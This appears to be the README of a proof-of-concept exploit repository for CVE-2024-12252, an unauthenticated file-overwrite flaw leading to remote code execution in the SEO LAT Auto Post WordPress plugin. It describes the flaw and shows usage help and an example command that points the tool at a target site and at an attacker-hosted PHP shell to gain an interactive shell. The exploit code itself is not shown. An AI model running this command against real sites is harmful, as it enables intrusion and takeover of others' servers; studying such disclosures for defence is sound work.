SEO LAT Auto Post <= 2.2.1 - Missing Authorization to File Overwrite/Upload (Remote Code Execution)# SEO LAT Auto Post <= 2.2.1 - Remote Code Execution
## Description
The SEO LAT Auto Post plugin for WordPress is vulnerable to file overwrite due to a missing capability check on the `remote_update` AJAX action in all versions up to, and including, 2.2.1. This makes it possible for unauthenticated attackers to overwrite the `seo-beginner-auto-post.php` file which can be leveraged to achieve remote code execution.
## Vulnerability Details
- **CVE**: CVE-2024-12252
- **CVSS Score**: 9.8 (Critical)
## Exploitation
This script exploits the vulnerability in the SEO LAT Auto Post plugin to achieve remote code execution by overwriting the `seo-beginner-auto-post.php` file. The script automates the process of checking the plugin version, triggering the exploit, and providing an interactive shell for executing commands.
## Usage
```plaintext
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL
CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
Direct URL to your malicious PHP shell
```
Run the script with the target URL and the URL to your malicious PHP shell:
```sh
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php
```
## References
- [Wordfence Intelligence](https://www.wordfence.com/)
- [CVE-2024-12252](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-12252)
[4.0K] /data/pocs/d3d886e5bf33988634329e08becc89b3ba85d67d
├── [3.5K] CVE-2024-12252.py
├── [1.1K] LICENSE
├── [1.6K] README.md
└── [ 9] requirements.txt
0 directories, 4 files